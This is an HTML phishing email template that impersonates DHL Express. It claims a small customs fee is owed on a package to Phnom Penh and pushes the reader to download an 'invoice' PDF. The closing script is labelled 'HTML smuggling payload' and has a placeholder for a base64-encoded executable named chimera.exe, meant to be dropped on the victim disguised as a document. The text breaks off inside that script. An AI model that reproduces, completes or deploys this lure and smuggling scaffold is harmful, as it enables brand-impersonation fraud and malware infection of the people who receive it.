<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>DHL Express - Shipment Invoice #DH4839210</title>
  <link rel="icon" href="https://www.dhl.com/etc.clientlibs/dhl/clientlibs/clientlib-site/resources/favicon.ico"/>
  <style>
    body {
      margin:0; padding:0; background:#f4f4f4; font-family:'Segoe UI',Arial,sans-serif;
      line-height:1.5; color:#333;
    }
    .container {
      max-width:680px; margin:20px auto; background:#fff; border-radius:8px;
      overflow:hidden; box-shadow:0 4px 20px rgba(0,0,0,0.1);
    }
    .header {
      background:#d40511; color:white; padding:20px; text-align:center;
    }
    .header img {
      height:50px;
    }
    .content {
      padding:30px;
    }
    .alert {
      background:#fff8e1; border-left:5px solid #ff9800; padding:15px; margin:20px 0;
      font-weight:600;
    }
    .invoice-box {
      border:1px solid #eee; padding:20px; background:#fafafa; margin:25px 0;
    }
    table {
      width:100%; border-collapse:collapse; margin:20px 0;
    }
    td, th {
      padding:10px; text-align:left; border-bottom:1px solid #ddd;
    }
    .btn {
      display:inline-block; background:#d40511; color:white; padding:14px 30px;
      text-decoration:none; border-radius:5px; font-weight:bold; margin:20px 0;
      box-shadow:0 4px 10px rgba(212,5,17,0.3);
    }
    .btn:hover {
      background:#b0040f;
    }
    .footer {
      background:#222; color:#aaa; padding:25px; text-align:center; font-size:12px;
    }
    .footer a { color:#d40511; text-decoration:none; }
  </style>
</head>
<body>

<div class="container">
  <!-- DHL Header -->
  <div class="header">
    <img src="https://upload.wikimedia.org/wikipedia/commons/a/a4/DHL_Express_Logo.svg" alt="DHL Express">
    <h1>Shipment Invoice & Customs Documentation</h1>
  </div>

  <div class="content">
    <h2>Dear Valued Customer,</h2>
    <p>We attempted to deliver your package <strong>#DH4839210</strong> today, but additional customs clearance fees are required before final delivery can be completed.</p>

    <div class="alert">
      ⚠️ Action Required: Pay the outstanding customs fee of <strong>USD 4.99</strong> within 48 hours to avoid return of shipment.
    </div>

    <div class="invoice-box">
      <table>
        <tr><th>Shipment Number</th><td>DH4839210-KH</td></tr>
        <tr><th>Origin</th><td>Singapore</td></tr>
        <tr><th>Destination</th><td>Phnom Penh, Cambodia</td></tr>
        <tr><th>Weight</th><td>0.8 kg</td></tr>
        <tr><th>Customs Fee Due</th><td><span style="color:#d40511;font-size:1.3em;">USD 4.99</span></td></tr>
      </table>
    </div>

    <p style="text-align:center;">
      <a href="#" class="btn" id="downloadBtn">
        📄 Download Invoice & Payment Form (PDF)
      </a>
    </p>

    <p>This document contains your detailed invoice and a secure payment link. Please download and review immediately.</p>
    <p>Thank you for choosing DHL Express.<br><strong>DHL Delivery Team</strong></p>
  </div>

  <div class="footer">
    © 2025 DHL International GmbH. All rights reserved.<br>
    This is an automated message. Please do not reply. | <a href="#">Unsubscribe</a> | <a href="#">Privacy Policy</a>
  </div>
</div>

<!-- ====================== HTML SMUGGLING PAYLOAD ====================== -->
<script>
// === PASTE YOUR BASE64-ENCODED chimera.exe HERE ===
var base64Payload = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."; 
<